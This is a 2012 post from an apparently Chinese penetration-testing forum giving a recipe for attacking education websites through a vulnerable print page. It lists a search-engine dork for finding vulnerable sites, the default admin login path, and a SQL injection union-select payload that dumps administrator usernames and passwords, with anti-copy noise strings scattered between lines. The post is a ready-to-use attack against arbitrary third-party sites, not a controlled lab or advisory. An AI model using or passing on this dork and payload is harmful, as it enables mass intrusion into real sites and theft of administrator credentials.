中国网络渗透测试联盟
标题:
某教育站打印页面漏洞批量webshell
[打印本页]
作者:
admin
时间:
2012-10-31 08:37
标题:
某教育站打印页面漏洞批量webshell
教育站打印页面漏洞
3 {4 h* M+ X3 U8 r, P
百度或google搜索 inurl:info_Print.asp?ArticleID=
/ M0 Y& ^: i* ?$ ?9 j
默认后台:/ad_login.asp
9 I# b, h% W8 o A
爆管理员密码:
' c5 A/ L6 s: h; u% E4 }4 u
在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可
/ K1 t& E# y. x' u
+ @8 C3 I5 L8 K; v s: [
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
8 X9 H) o( t, _4 w q% F. e3 m$ _
$ B3 a0 ?/ T. o. {! e5 K q
作者:佚名
. [" C" b/ E h& d8 ?$ N0 X& h
( s5 B- {6 T; i
8 c, e1 A2 d) f
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2